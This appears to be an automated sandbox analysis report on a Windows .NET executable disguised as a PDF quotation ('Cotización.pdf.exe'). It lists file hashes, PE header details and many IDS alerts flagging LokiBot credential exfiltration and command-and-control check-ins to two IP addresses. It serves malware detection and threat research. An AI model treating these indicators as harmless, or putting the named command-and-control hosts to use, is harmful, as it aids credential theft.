                                      Process:C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):24702
                                      Entropy (8bit):0.602750003278513
                                      Encrypted:false
                                      SSDEEP:3:/lbOllbOllbOllbOllbOllbOllbOllbOllbOllbOllbOllbOllbOllbOllbOllbp:O
                                      MD5:534613AB9EEB27C69A8082AC2D9C5B80
                                      SHA1:756231627E41DD5C039BDB59521DCB8E023DC668
                                      SHA-256:66F5058E785790977F9371D168327699E694266B65C4B4E60931598B9B73499C
                                      SHA-512:99EC30E677BBFDDEB211D8E0753C98E855EA25299149B3B22CCFD7B5DFD3DD86D856341F14EC54398257780673E0101FB06F79803F02CBAC1F08BB744DBAC71B
                                      Malicious:false
                                      Reputation:low
                                      Preview: ........................................user.......................................................................................user.......................................................................................user.......................................................................................user.......................................................................................user.......................................................................................user.......................................................................................user.......................................................................................user.......................................................................................user.......................................................................................user.......................................................................................user...................................

                                      Static File Info

                                      General

                                      File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                      Entropy (8bit):7.557249103328847
                                      TrID:
                                      • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                      • Win32 Executable (generic) a (10002005/4) 49.75%
                                      • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                      • Windows Screen Saver (13104/52) 0.07%
                                      • Generic Win/DOS Executable (2004/3) 0.01%
                                      File name:Cotizaci#U00f3n.pdf.exe
                                      File size:556032
                                      MD5:5e628ac4e53fd5b94632c03a7c43aed5
                                      SHA1:3fb9bcd126c63af555539447b4d1ae19da45e849
                                      SHA256:16e4415dae57c511d49d504e34ec2bb999f850b433c8bcdc071c5e629aeb8490
                                      SHA512:d3fcc7cc1e2834f1f02b46d2baee0b8d73c8919da443dabe8108c91cb0e691ddc486f052fbab1f48690a446e60a10b039c7ca4b53bee6c3c8545cd8caeee2201
                                      SSDEEP:12288:j5kZuGRMlCbAeC6qPbZoVYr4sIxEXtdTqZ4eFgu8+AZ4LLr:y7RMQW6obeYtnG7
                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......`..............0..r............... ........@.. ....................................@................................

                                      File Icon

                                      Icon Hash:00828e8e8686b000

                                      Static PE Info

                                      General

                                      Entrypoint:0x48910e
                                      Entrypoint Section:.text
                                      Digitally signed:false
                                      Imagebase:0x400000
                                      Subsystem:windows gui
                                      Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                                      DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                      Time Stamp:0x60F00B15 [Thu Jul 15 10:16:53 2021 UTC]
                                      TLS Callbacks:
                                      CLR (.Net) Version:v4.0.30319
                                      OS Version Major:4
                                      OS Version Minor:0
                                      File Version Major:4
                                      File Version Minor:0
                                      Subsystem Version Major:4
                                      Subsystem Version Minor:0
                                      Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                      Entrypoint Preview

                                      Instruction
                                      jmp dword ptr [00402000h]
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al

                                      Data Directories

                                      NameVirtual AddressVirtual Size Is in Section
                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                      IMAGE_DIRECTORY_ENTRY_IMPORT0x890bc0x4f.text
                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0x8a0000x5b0.rsrc
                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x8c0000xc.reloc
                                      IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                      IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                      Sections

                                      NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                      .text0x20000x871140x87200False0.799543608349data7.56769792307IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                      .rsrc0x8a0000x5b00x600False0.423177083333data4.13123348605IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                      .reloc0x8c0000xc0x200False0.044921875data0.101910425663IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                      Resources

                                      NameRVASizeTypeLanguageCountry
                                      RT_VERSION0x8a0a00x324data
                                      RT_MANIFEST0x8a3c40x1eaXML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators

                                      Imports

                                      DLLImport
                                      mscoree.dll_CorExeMain

                                      Version Infos

                                      DescriptionData
                                      Translation0x0000 0x04b0
                                      LegalCopyrightCopyright 2015
                                      Assembly Version1.0.0.0
                                      InternalName2S4BI4J3B.exe
                                      FileVersion1.0.0.0
                                      CompanyName
                                      LegalTrademarks
                                      Comments
                                      ProductNamePyramidGame
                                      ProductVersion1.0.0.0
                                      FileDescriptionPyramidGame
                                      OriginalFilename2S4BI4J3B.exe

                                      Network Behavior

                                      Snort IDS Alerts

                                      TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                      07/15/21-12:43:47.907135TCP2024312ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M14972580192.168.2.3104.21.6.222
                                      07/15/21-12:43:47.907135TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4972580192.168.2.3104.21.6.222
                                      07/15/21-12:43:47.907135TCP2025381ET TROJAN LokiBot Checkin4972580192.168.2.3104.21.6.222
                                      07/15/21-12:43:48.439978TCP2024312ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M14972680192.168.2.3172.67.155.45
                                      07/15/21-12:43:48.439978TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4972680192.168.2.3172.67.155.45
                                      07/15/21-12:43:48.439978TCP2025381ET TROJAN LokiBot Checkin4972680192.168.2.3172.67.155.45
                                      07/15/21-12:43:48.868817TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14972780192.168.2.3104.21.6.222
                                      07/15/21-12:43:48.868817TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4972780192.168.2.3104.21.6.222
                                      07/15/21-12:43:48.868817TCP2025381ET TROJAN LokiBot Checkin4972780192.168.2.3104.21.6.222
                                      07/15/21-12:43:49.489131TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14972880192.168.2.3172.67.155.45
                                      07/15/21-12:43:49.489131TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4972880192.168.2.3172.67.155.45
                                      07/15/21-12:43:49.489131TCP2025381ET TROJAN LokiBot Checkin4972880192.168.2.3172.67.155.45
                                      07/15/21-12:43:50.130475TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14972980192.168.2.3172.67.155.45
                                      07/15/21-12:43:50.130475TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4972980192.168.2.3172.67.155.45
                                      07/15/21-12:43:50.130475TCP2025381ET TROJAN LokiBot Checkin4972980192.168.2.3172.67.155.45
                                      07/15/21-12:43:50.949749TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14973080192.168.2.3172.67.155.45
                                      07/15/21-12:43:50.949749TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4973080192.168.2.3172.67.155.45
                                      07/15/21-12:43:50.949749TCP2025381ET TROJAN LokiBot Checkin4973080192.168.2.3172.67.155.45
                                      07/15/21-12:43:51.536430TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14973180192.168.2.3172.67.155.45
                                      07/15/21-12:43:51.536430TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4973180192.168.2.3172.67.155.45
                                      07/15/21-12:43:51.536430TCP2025381ET TROJAN LokiBot Checkin4973180192.168.2.3172.67.155.45
                                      07/15/21-12:43:52.663591TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14973280192.168.2.3172.67.155.45
                                      07/15/21-12:43:52.663591TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4973280192.168.2.3172.67.155.45
                                      07/15/21-12:43:52.663591TCP2025381ET TROJAN LokiBot Checkin4973280192.168.2.3172.67.155.45
                                      07/15/21-12:43:54.194818TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14973380192.168.2.3104.21.6.222
                                      07/15/21-12:43:54.194818TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4973380192.168.2.3104.21.6.222
                                      07/15/21-12:43:54.194818TCP2025381ET TROJAN LokiBot Checkin4973380192.168.2.3104.21.6.222
                                      07/15/21-12:43:54.766120TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14973480192.168.2.3172.67.155.45
                                      07/15/21-12:43:54.766120TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4973480192.168.2.3172.67.155.45
                                      07/15/21-12:43:54.766120TCP2025381ET TROJAN LokiBot Checkin4973480192.168.2.3172.67.155.45
                                      07/15/21-12:43:55.280241TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14973580192.168.2.3104.21.6.222
                                      07/15/21-12:43:55.280241TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4973580192.168.2.3104.21.6.222
                                      07/15/21-12:43:55.280241TCP2025381ET TROJAN LokiBot Checkin4973580192.168.2.3104.21.6.222
                                      07/15/21-12:43:55.996023TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14973680192.168.2.3172.67.155.45
                                      07/15/21-12:43:55.996023TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4973680192.168.2.3172.67.155.45
                                      07/15/21-12:43:55.996023TCP2025381ET TROJAN LokiBot Checkin4973680192.168.2.3172.67.155.45
                                      07/15/21-12:43:56.554640TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14973880192.168.2.3104.21.6.222
                                      07/15/21-12:43:56.554640TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4973880192.168.2.3104.21.6.222
                                      07/15/21-12:43:56.554640TCP2025381ET TROJAN LokiBot Checkin4973880192.168.2.3104.21.6.222
                                      07/15/21-12:43:57.132748TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14973980192.168.2.3104.21.6.222
                                      07/15/21-12:43:57.132748TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4973980192.168.2.3104.21.6.222
                                      07/15/21-12:43:57.132748TCP2025381ET TROJAN LokiBot Checkin4973980192.168.2.3104.21.6.222
                                      07/15/21-12:43:57.720314TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14974080192.168.2.3104.21.6.222
                                      07/15/21-12:43:57.720314TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4974080192.168.2.3104.21.6.222
                                      07/15/21-12:43:57.720314TCP2025381ET TROJAN LokiBot Checkin4974080192.168.2.3104.21.6.222
                                      07/15/21-12:43:58.273470TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14974180192.168.2.3172.67.155.45
                                      07/15/21-12:43:58.273470TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4974180192.168.2.3172.67.155.45
                                      07/15/21-12:43:58.273470TCP2025381ET TROJAN LokiBot Checkin4974180192.168.2.3172.67.155.45
                                      07/15/21-12:43:58.915357TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14974280192.168.2.3172.67.155.45
                                      07/15/21-12:43:58.915357TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4974280192.168.2.3172.67.155.45
                                      07/15/21-12:43:58.915357TCP2025381ET TROJAN LokiBot Checkin4974280192.168.2.3172.67.155.45
                                      07/15/21-12:43:59.452094TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14974380192.168.2.3172.67.155.45
                                      07/15/21-12:43:59.452094TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4974380192.168.2.3172.67.155.45
                                      07/15/21-12:43:59.452094TCP2025381ET TROJAN LokiBot Checkin4974380192.168.2.3172.67.155.45
                                      07/15/21-12:44:00.017564TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14974480192.168.2.3104.21.6.222
                                      07/15/21-12:44:00.017564TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4974480192.168.2.3104.21.6.222
                                      07/15/21-12:44:00.017564TCP2025381ET TROJAN LokiBot Checkin4974480192.168.2.3104.21.6.222
                                      07/15/21-12:44:00.573298TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14974580192.168.2.3172.67.155.45
                                      07/15/21-12:44:00.573298TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4974580192.168.2.3172.67.155.45
                                      07/15/21-12:44:00.573298TCP2025381ET TROJAN LokiBot Checkin4974580192.168.2.3172.67.155.45
                                      07/15/21-12:44:01.084926TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14974680192.168.2.3104.21.6.222
                                      07/15/21-12:44:01.084926TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4974680192.168.2.3104.21.6.222
                                      07/15/21-12:44:01.084926TCP2025381ET TROJAN LokiBot Checkin4974680192.168.2.3104.21.6.222
                                      07/15/21-12:44:01.694096TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14974780192.168.2.3172.67.155.45
                                      07/15/21-12:44:01.694096TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4974780192.168.2.3172.67.155.45
                                      07/15/21-12:44:01.694096TCP2025381ET TROJAN LokiBot Checkin4974780192.168.2.3172.67.155.45
                                      07/15/21-12:44:02.339421TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14974880192.168.2.3172.67.155.45
                                      07/15/21-12:44:02.339421TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4974880192.168.2.3172.67.155.45
                                      07/15/21-12:44:02.339421TCP2025381ET TROJAN LokiBot Checkin4974880192.168.2.3172.67.155.45
                                      07/15/21-12:44:02.980964TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14974980192.168.2.3104.21.6.222
                                      07/15/21-12:44:02.980964TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4974980192.168.2.3104.21.6.222
                                      07/15/21-12:44:02.980964TCP2025381ET TROJAN LokiBot Checkin4974980192.168.2.3104.21.6.222
                                      07/15/21-12:44:03.732526TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14975080192.168.2.3104.21.6.222
                                      07/15/21-12:44:03.732526TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4975080192.168.2.3104.21.6.222
                                      07/15/21-12:44:03.732526TCP2025381ET TROJAN LokiBot Checkin4975080192.168.2.3104.21.6.222
                                      07/15/21-12:44:04.280299TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14975180192.168.2.3172.67.155.45
                                      07/15/21-12:44:04.280299TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4975180192.168.2.3172.67.155.45
                                      07/15/21-12:44:04.280299TCP2025381ET TROJAN LokiBot Checkin4975180192.168.2.3172.67.155.45
                                      07/15/21-12:44:04.800228TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14975280192.168.2.3104.21.6.222
                                      07/15/21-12:44:04.800228TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4975280192.168.2.3104.21.6.222
                                      07/15/21-12:44:04.800228TCP2025381ET TROJAN LokiBot Checkin4975280192.168.2.3104.21.6.222
                                      07/15/21-12:44:05.436606TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14975380192.168.2.3104.21.6.222
                                      07/15/21-12:44:05.436606TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4975380192.168.2.3104.21.6.222
                                      07/15/21-12:44:05.436606TCP2025381ET TROJAN LokiBot Checkin4975380192.168.2.3104.21.6.222
                                      07/15/21-12:44:06.026384TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14975480192.168.2.3172.67.155.45
                                      07/15/21-12:44:06.026384TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4975480192.168.2.3172.67.155.45
                                      07/15/21-12:44:06.026384TCP2025381ET TROJAN LokiBot Checkin4975480192.168.2.3172.67.155.45
                                      07/15/21-12:44:06.549988TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14975580192.168.2.3104.21.6.222
                                      07/15/21-12:44:06.549988TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4975580192.168.2.3104.21.6.222
                                      07/15/21-12:44:06.549988TCP2025381ET TROJAN LokiBot Checkin4975580192.168.2.3104.21.6.222
                                      07/15/21-12:44:07.191427TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14975980192.168.2.3172.67.155.45
                                      07/15/21-12:44:07.191427TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4975980192.168.2.3172.67.155.45
                                      07/15/21-12:44:07.191427TCP2025381ET TROJAN LokiBot Checkin4975980192.168.2.3172.67.155.45
                                      07/15/21-12:44:07.738234TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14976080192.168.2.3104.21.6.222
                                      07/15/21-12:44:07.738234TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4976080192.168.2.3104.21.6.222
                                      07/15/21-12:44:07.738234TCP2025381ET TROJAN LokiBot Checkin4976080192.168.2.3104.21.6.222
                                      07/15/21-12:44:08.301657TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14976180192.168.2.3172.67.155.45
                                      07/15/21-12:44:08.301657TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4976180192.168.2.3172.67.155.45
                                      07/15/21-12:44:08.301657TCP2025381ET TROJAN LokiBot Checkin4976180192.168.2.3172.67.155.45
                                      07/15/21-12:44:08.829385TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14976280192.168.2.3104.21.6.222
                                      07/15/21-12:44:08.829385TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4976280192.168.2.3104.21.6.222
                                      07/15/21-12:44:08.829385TCP2025381ET TROJAN LokiBot Checkin4976280192.168.2.3104.21.6.222
                                      07/15/21-12:44:09.410997TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14976380192.168.2.3172.67.155.45
                                      07/15/21-12:44:09.410997TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4976380192.168.2.3172.67.155.45
                                      07/15/21-12:44:09.410997TCP2025381ET TROJAN LokiBot Checkin4976380192.168.2.3172.67.155.45
                                      07/15/21-12:44:09.931591TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14976480192.168.2.3104.21.6.222
                                      07/15/21-12:44:09.931591TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4976480192.168.2.3104.21.6.222
                                      07/15/21-12:44:09.931591TCP2025381ET TROJAN LokiBot Checkin4976480192.168.2.3104.21.6.222
                                      07/15/21-12:44:10.478094TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14976580192.168.2.3172.67.155.45
                                      07/15/21-12:44:10.478094TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4976580192.168.2.3172.67.155.45
                                      07/15/21-12:44:10.478094TCP2025381ET TROJAN LokiBot Checkin4976580192.168.2.3172.67.155.45
                                      07/15/21-12:44:11.071848TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14976680192.168.2.3172.67.155.45
                                      07/15/21-12:44:11.071848TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4976680192.168.2.3172.67.155.45
                                      07/15/21-12:44:11.071848TCP2025381ET TROJAN LokiBot Checkin4976680192.168.2.3172.67.155.45
                                      07/15/21-12:44:11.598311TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14976780192.168.2.3104.21.6.222
                                      07/15/21-12:44:11.598311TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4976780192.168.2.3104.21.6.222
                                      07/15/21-12:44:11.598311TCP2025381ET TROJAN LokiBot Checkin4976780192.168.2.3104.21.6.222
                                      07/15/21-12:44:12.313742TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14976880192.168.2.3104.21.6.222
                                      07/15/21-12:44:12.313742TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4976880192.168.2.3104.21.6.222
                                      07/15/21-12:44:12.313742TCP2025381ET TROJAN LokiBot Checkin4976880192.168.2.3104.21.6.222
                                      07/15/21-12:44:12.868913TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14976980192.168.2.3104.21.6.222
                                      07/15/21-12:44:12.868913TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4976980192.168.2.3104.21.6.222
                                      07/15/21-12:44:12.868913TCP2025381ET TROJAN LokiBot Checkin4976980192.168.2.3104.21.6.222
                                      07/15/21-12:44:13.424882TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14977580192.168.2.3172.67.155.45
                                      07/15/21-12:44:13.424882TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4977580192.168.2.3172.67.155.45
                                      07/15/21-12:44:13.424882TCP2025381ET TROJAN LokiBot Checkin4977580192.168.2.3172.67.155.45
                                      07/15/21-12:44:14.039048TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14977680192.168.2.3172.67.155.45
                                      07/15/21-12:44:14.039048TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4977680192.168.2.3172.67.155.45
                                      07/15/21-12:44:14.039048TCP2025381ET TROJAN LokiBot Checkin4977680192.168.2.3172.67.155.45
                                      07/15/21-12:44:14.674281TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14977780192.168.2.3104.21.6.222
                                      07/15/21-12:44:14.674281TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4977780192.168.2.3104.21.6.222
                                      07/15/21-12:44:14.674281TCP2025381ET TROJAN LokiBot Checkin4977780192.168.2.3104.21.6.222
                                      07/15/21-12:44:15.172918TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14977880192.168.2.3104.21.6.222
                                      07/15/21-12:44:15.172918TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4977880192.168.2.3104.21.6.222
                                      07/15/21-12:44:15.172918TCP2025381ET TROJAN LokiBot Checkin4977880192.168.2.3104.21.6.222
                                      07/15/21-12:44:15.665577TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14977980192.168.2.3172.67.155.45
                                      07/15/21-12:44:15.665577TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4977980192.168.2.3172.67.155.45
                                      07/15/21-12:44:15.665577TCP2025381ET TROJAN LokiBot Checkin4977980192.168.2.3172.67.155.45
                                      07/15/21-12:44:16.192708TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14978080192.168.2.3172.67.155.45
                                      07/15/21-12:44:16.192708TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4978080192.168.2.3172.67.155.45
                                      07/15/21-12:44:16.192708TCP2025381ET TROJAN LokiBot Checkin4978080192.168.2.3172.67.155.45
                                      07/15/21-12:44:16.711226TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14978180192.168.2.3104.21.6.222
                                      07/15/21-12:44:16.711226TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4978180192.168.2.3104.21.6.222
                                      07/15/21-12:44:16.711226TCP2025381ET TROJAN LokiBot Checkin4978180192.168.2.3104.21.6.222
                                      07/15/21-12:44:17.401129TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14978280192.168.2.3104.21.6.222
                                      07/15/21-12:44:17.401129TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4978280192.168.2.3104.21.6.222
                                      07/15/21-12:44:17.401129TCP2025381ET TROJAN LokiBot Checkin4978280192.168.2.3104.21.6.222
                                      07/15/21-12:44:17.926230TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14978380192.168.2.3172.67.155.45
                                      07/15/21-12:44:17.926230TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4978380192.168.2.3172.67.155.45
                                      07/15/21-12:44:17.926230TCP2025381ET TROJAN LokiBot Checkin4978380192.168.2.3172.67.155.45
                                      07/15/21-12:44:18.410196TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14978480192.168.2.3172.67.155.45
                                      07/15/21-12:44:18.410196TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4978480192.168.2.3172.67.155.45
                                      07/15/21-12:44:18.410196TCP2025381ET TROJAN LokiBot Checkin4978480192.168.2.3172.67.155.45
                                      07/15/21-12:44:18.933049TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14978580192.168.2.3104.21.6.222
                                      07/15/21-12:44:18.933049TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4978580192.168.2.3104.21.6.222
                                      07/15/21-12:44:18.933049TCP2025381ET TROJAN LokiBot Checkin4978580192.168.2.3104.21.6.222
                                      07/15/21-12:44:19.492387TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14978680192.168.2.3104.21.6.222
                                      07/15/21-12:44:19.492387TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4978680192.168.2.3104.21.6.222
                                      07/15/21-12:44:19.492387TCP2025381ET TROJAN LokiBot Checkin4978680192.168.2.3104.21.6.222
                                      07/15/21-12:44:20.003487TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14978780192.168.2.3104.21.6.222
                                      07/15/21-12:44:20.003487TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4978780192.168.2.3104.21.6.222
                                      07/15/21-12:44:20.003487TCP2025381ET TROJAN LokiBot Checkin4978780192.168.2.3104.21.6.222
                                      07/15/21-12:44:20.510213TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14978880192.168.2.3104.21.6.222
                                      07/15/21-12:44:20.510213TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4978880192.168.2.3104.21.6.222
                                      07/15/21-12:44:20.510213TCP2025381ET TROJAN LokiBot Checkin4978880192.168.2.3104.21.6.222
                                      07/15/21-12:44:21.063344TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14978980192.168.2.3172.67.155.45
